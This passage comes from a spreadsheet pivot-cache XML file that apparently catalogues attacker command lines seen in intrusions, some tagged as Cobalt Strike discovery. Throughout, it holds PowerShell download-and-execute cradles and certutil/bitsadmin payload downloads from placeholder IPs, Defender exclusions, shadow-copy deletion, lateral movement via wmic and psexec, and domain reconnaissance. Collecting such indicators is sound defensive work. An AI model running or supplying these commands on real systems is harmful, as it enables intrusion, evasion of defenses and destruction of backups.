    <s v="cmd.exe /Q /c cd goat.exe 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0094"/>
    <m/>
    <m/>
    <s v="&quot;c:\windows\system32\wscript.exe&quot; C:\users\&lt;&gt;\ApData\Local\Temp\&lt;&gt;.zip\Document[2023.10.11_08-07].vbs&quot;"/>
    <s v="C:\windows\Explorer.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0095"/>
    <m/>
    <m/>
    <s v="&quot;c:\windows\system32\regsvr32.exe&quot; c:\windows\temp\03070-1.dll"/>
    <s v="&quot;c:\windows\system32\wscript.exe&quot; C:\users\&lt;&gt;\ApData\Local\Temp\&lt;&gt;.zip\Document[2023.10.11_08-07].vbs"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0096"/>
    <m/>
    <m/>
    <s v="cmd /c rundll32.exe c:\Users\&lt;&gt;\AppData\Roaming\&lt;&gt;{40502BA4-3D3D-8C90-*C72-2D965AA9FD9B} \iwiqocacod.dll,#1"/>
    <s v="&quot;c:\windows\system32\regsvr32.exe&quot; c:\windows\temp\03070-1.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0097"/>
    <m/>
    <m/>
    <s v=" bitsadmin /transfer mydownloadjob /download /priority normal http://&lt;IP&gt;:80/download/test1.exe c:\programdata\s1.exe"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0098"/>
    <m/>
    <m/>
    <s v="certutil -urlcache -split -f http://&lt;IP&gt;:80/download/test1.exe C:\programdata\cscs.exe"/>
    <s v="cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0099"/>
    <m/>
    <m/>
    <s v="certutil -urlcache -split -f http://&lt;IP&gt;:80/download/http64.exe C:\programdata\cscss.exe"/>
    <s v="cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0100"/>
    <m/>
    <m/>
    <s v="certutil -urlcache -split -f http://&lt;IP&gt;:80/download/http64.exe C:\programdata\cs cssss.exe"/>
    <s v="cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0101"/>
    <m/>
    <m/>
    <s v="cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot;"/>
    <s v="powershell.exe -nop -w hidden -c &quot; IEX ((new-object net.webclient).downloadstring('http://&lt;IP&gt;:80/ksaid'))&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0102"/>
    <m/>
    <m/>
    <s v="cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot;"/>
    <s v="powershell.exe -nop -w hidden -c &quot; IEX ((new-object net.webclient).downloadstring('http://&lt;IP&gt;:80/ksajSK'))&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0103"/>
    <m/>
    <m/>
    <s v="powershell.exe -nop -w hidden -c &quot; IEX ((new-object net.webclient).downloadstring('http://&lt;IP&gt;:80/ksaid'))&quot;"/>
    <s v="cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0104"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\rundll32.exe"/>
    <s v="cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0105"/>
    <m/>
    <m/>
    <s v="cmd.exe /c chcp &gt;&amp;2"/>
    <s v="cmd /c rundll32.exe c:\Users\&lt;&gt;\AppData\Roaming\&lt;&gt;{40502BA4-3D3D-8C90-*C72-2D965AA9FD9B} \iwiqocacod.dll,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0106"/>
    <m/>
    <m/>
    <s v="net config workstation"/>
    <s v="cmd /c rundll32.exe c:\Users\&lt;&gt;\AppData\Roaming\&lt;&gt;{40502BA4-3D3D-8C90-*C72-2D965AA9FD9B} \iwiqocacod.dll,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0107"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="ipconfig /all"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0108"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="systeminfo"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0109"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="net config workstation"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0110"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="nltest /domain_trusts"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0111"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0112"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="net view /all /domain"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0113"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="net view /all"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0114"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0115"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="nltest  /dclist:"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0116"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="net  group &quot;domain admins&quot; /domain"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0117"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="net  group &quot;Domain Computers&quot; /domain"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0118"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="net  group &quot;domain admins&quot; /domain"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0119"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="net  group &quot;enterprise admins&quot; /domain"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0120"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="nltest  /dclist:"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0121"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="net  group &quot;domain admins&quot; /domain"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0122"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="quser"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0123"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="ipconfig  /all"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0124"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="net  group &quot;domain computers&quot; /domain"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0125"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="systeminfo"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0126"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="route  print"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0127"/>
    <m/>
    <s v="Cobalt Strike Beacon Run Disco CMD"/>
    <s v="nltest  /dclist:"/>
    <s v=" cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random_uuid&gt;run.cmd&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0128"/>
    <m/>
    <m/>
    <s v="&quot;C:\Users\&lt;&gt;\Desktop\netscan.exe&quot;"/>
    <s v="C:\windows\Explorer.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0129"/>
    <m/>
    <m/>
    <s v="&quot;C:\Users\&lt;&gt;\Desktop\64-bit\netscan.exe&quot;"/>
    <s v="C:\windows\Explorer.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0130"/>
    <m/>
    <m/>
    <s v="XCOPY /f /y &quot;c:\programdata\setup.exe&quot; &quot;\\&lt;ip&gt;\C$"/>
    <s v="c:\windows\System32\cmd.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0131"/>
    <m/>
    <m/>
    <s v="cmd /c wmic /node &lt;&gt; process call create &quot;c:\programdata\BNUfUOmFT2.exe p7BQXbycbpiH -QnA -4Nc -gd -A -4heGxsuj -yrefVf -91nHs -9eGxd -etRzp6kw -gzfW3"/>
    <s v="c:\windows\System32\cmd.exe"/>
    <s v="wmic.exe"/>
    <s v="cmd.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0132"/>
    <m/>
    <m/>
    <s v="BNUfUOmFT2.exe p7BQXbycbpiH -QnA -4Nc -gd -A -4heGxsuj -yrefVf -91nHs -9eGxd -etRzp6kw -gzfW3"/>
    <m/>
    <m/>
    <s v="WmiPrvSE.exe"/>
    <s v="c:\programdata\BNUfUOmFT2.exe"/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0133"/>
    <m/>
    <s v="screen connect installed"/>
    <s v="c:\windows\System32\msiexec.exe /I %LOCALAPPDAT%\TEMP\setup.msi"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0134"/>
    <m/>
    <m/>
    <s v="powershell -inputformat non -outputformat none -noninteractive -ExecutionPolicy Bypoass -Command Add-Mpreference -ExclusionPath 'C:\'"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0135"/>
    <m/>
    <m/>
    <s v="attrib  +s +h /D &quot;C:\Program Files\Windows NT\*.*&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0136"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0137"/>
    <m/>
    <m/>
    <s v="net group &quot;&quot;domain admins&quot;&quot; /domain "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0138"/>
    <m/>
    <m/>
    <s v="net group &quot;&quot;Domain Computers&quot;&quot; /domain "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0139"/>
    <m/>
    <m/>
    <s v="net group /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0140"/>
    <m/>
    <m/>
    <s v="systeminfo "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0141"/>
    <m/>
    <m/>
    <s v="whoami /groups"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0142"/>
    <m/>
    <m/>
    <s v="net group &quot;domain admins&quot; /domain "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0143"/>
    <m/>
    <m/>
    <s v="nltest /dclist:&lt;DOMAINNAME&gt;.local"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0144"/>
    <m/>
    <m/>
    <s v="WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0145"/>
    <m/>
    <m/>
    <s v="net user &lt;PRIV_USER&gt; /domain "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0146"/>
    <m/>
    <m/>
    <s v="ping &lt;workstation1&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0147"/>
    <m/>
    <m/>
    <s v="net view //&lt;IP1&gt;/"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0148"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0149"/>
    <m/>
    <m/>
    <s v="nltest /dclist:&lt;DOMAIN&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0150"/>
    <m/>
    <m/>
    <s v="ping &lt;DOMAIN&gt; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0151"/>
    <m/>
    <m/>
    <s v="nltest /FINDUSER:REDACTED"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0152"/>
    <m/>
    <m/>
    <s v="&quot;C:\Program Files\WinRAR\WinRAR.exe&quot; a -ep1  -scul -r0 -iext   -imon1 -- . G:\REDACTED"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0153"/>
    <m/>
    <m/>
    <s v="psexec.exe @c:\share$\comps1.txt -u &lt;uname&gt; -p &lt;pwd&gt; cmd /c copy &quot;\&lt;device&gt;\share$123.exe&quot; &quot;c:\windows\temp&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0154"/>
    <m/>
    <m/>
    <s v="cmd.exe /c vssadmin delete shadows /all /quiet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0155"/>
    <m/>
    <m/>
    <s v="attrib +s +h /D &quot;C:\Program Files\Windows NT\*.*"/>
    <s v="C:\Windows\system32\cmd.exe cmd /c 4554.cmd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0156"/>
    <m/>
    <m/>
    <s v="cmd /c tar xf 855.zip"/>
    <s v="C:\Windows\system32\cmd.exe cmd /c 4554.cmd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0157"/>
    <m/>
    <m/>
    <s v="regsvr32 c:\programdata\2905.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0158"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe cmd /c 4554.cmd"/>
    <s v="&quot;C:\Users\&lt;&gt;\AppData\Local\Temp\is-IBSQG.tmp\Zoom_v_2.00.4.tmp&quot; /SL5=$702BC,102724573,140800,C:\Users\&lt;&gt;\Downloads\Zoom_v_2.00.4.exe&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0159"/>
    <m/>
    <m/>
    <s v="&quot;.1522\1522.exe&quot;"/>
    <s v="C:\Windows\system32\cmd.exe cmd /c 4554.cmd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0160"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /c echo 89ef6b4bcf &gt; \\.\pipe\8caf5e"/>
    <s v="C:\Windows\system32\dllhost.exe"/>
    <m/>
    <s v="dllhost.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0161"/>
    <m/>
    <m/>
    <s v="%WINDIR%\system32\cmd.exe /C wmic /node:&quot;REDACTED&quot; process call create &quot;%WINDIR%\Temp\svhost.exe &lt;IPADDRESS&gt;&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="procc-eid0162"/>
    <m/>
    <m/>
    <s v="c:\Windows\system32\cmd.exe /c echo e6b1e5ac4ae &gt; \\.\pipe\612990"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0163"/>
    <m/>
    <m/>
    <s v="reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v DenyTSConnections /t REG_DWORD /d 0 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0164"/>
    <m/>
    <m/>
    <s v="reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v DenyTSConnections /t REG_DWORD /d 0 /f&quot;, &quot;intiating_process_command_line"/>
    <s v="powershell -nop exec bypass -EncodedCommand &lt;encode&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0165"/>
    <m/>
    <m/>
    <s v="cmd.exe /c systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0166"/>
    <m/>
    <m/>
    <s v="cmd.exe /c nltest /dclist"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0167"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0168"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0169"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0170"/>
    <m/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0171"/>
    <m/>
    <m/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0172"/>
    <m/>
    <m/>
    <s v="adfind.exe  -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0173"/>
    <m/>
    <m/>
    <s v="AdFind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0174"/>
    <m/>
    <m/>
    <s v="AdFind.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0175"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\\cmd.exe /C systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0176"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C net group &quot;domain admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0177"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C nltest /dclist &lt;domainname redacted&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0178"/>
    <m/>
    <m/>
    <s v="nltest  /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0179"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C net group &quot;enterprise admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0180"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C ping &lt;hostname redacted&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0181"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\taskmgr.exe /4"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0182"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C All windows Import-Module ActiveDirectory Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate, IPv4Address | Export-CSV C:\Users\AllWindows.csv -NoTypeInformation -Encoding UTF8"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0183"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C route print"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0184"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C ping http://&lt;IP redacted&gt;/"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="procc-eid0185"/>
    <m/>
    <m/>
